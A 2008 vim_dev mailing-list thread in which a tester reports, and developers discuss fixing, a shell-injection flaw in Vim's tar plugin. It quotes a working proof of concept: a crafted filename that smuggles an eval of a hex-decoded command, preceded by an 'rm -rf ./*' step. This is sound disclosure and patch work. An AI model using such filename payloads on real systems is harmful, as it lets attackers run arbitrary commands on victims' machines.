Re: Fwd: Re: Collection of Vulnerabilities in Fully Patched Vim 7.1

  • Tony Mechelynck
    Message 1 of 3, Jul 1, 2008
      On 02/07/08 02:26, Jan Minář wrote:
      > Looks like this didn't go through, so here it is again:
      [...]
      > The updated tarplugin attack is rather simple:
      >
      > $ rm -rf ./*
      > $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |
      > xxd -r\`;'bar.tar"
      > $ vim +:q ./foo*
      > $ ls -l pwned
      > -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned
      >
      > Cheers,
      > Jan Minar.

      I'm seeing this too. Looks like a vulnerability to executing arbitrary
      shell commands via a specially crafted "tarfile" (which can be
      zero-length as here) with an unusual name. The maintainer of the suspect
      script ($VIMRUNTIME/plugin/tarPlugin.vim and/or
      $VIMRUNTIME/autoload/tar.vim) would be Dr. Chip; I think he's reading
      these groups but I'm adding him as a Bcc just in case (Dr. Chip, sorry
      if you got two copies of this post). FWIW, I'm using tarPlugin.vim v16
      (date not mentioned) and tar.vim v16 (dated Jun 12, 2008) on gvim 7.2a.11.

      Best regards,
      Tony.
      --
      Bureaucrat, n.:
      A person who cuts red tape sideways.
      -- J. McCabe

      --~--~---------~--~----~------------~-------~--~----~
      You received this message from the "vim_dev" maillist.
      For more information, visit http://www.vim.org/maillist.php
      -~----------~----~----~----~------~----~------~--~---
    • Bram Moolenaar
      Message 2 of 3, Jul 2, 2008
        Jan Minar wrote:

        > Looks like this didn't go through, so here it is again:

        I did see it. Thanks for the followup.

        The problem with the zip plugin was a mistake in the script, using has()
        instead of exists(). Has already been fixed, but it's not distributed
        yet.

        The problem with not escaping %, # and a few others needs to be solved.
        When using "!cmd arg" these characters need to be escaped. However,
        when using system() they must not be escaped, since the backslashes
        won't be removed.

        We could add an optional argument to shellescape() to indicate it's for
        system() or for ":!cmd". With one of them being the default.

        Another way would be to have two functions. Naming them isn't easy
        though. bangescape() and systemescape()?

        I think I prefer adding an argument to shellescape(). That way it's
        also clearer there is a choice if you read the docs.

        --
        hundred-and-one symptoms of being an internet addict:
        139. You down your lunch in five minutes, at your desk, so you can
        spend the rest of the hour surfing the Net.

        /// Bram Moolenaar -- Bram@... -- http://www.Moolenaar.net \\\
        /// sponsor Vim, vote for features -- http://www.Vim.org/sponsor/ \\\
        \\\ download, build and distribute -- http://www.A-A-P.org ///
        \\\ help me help AIDS victims -- http://ICCF-Holland.org ///
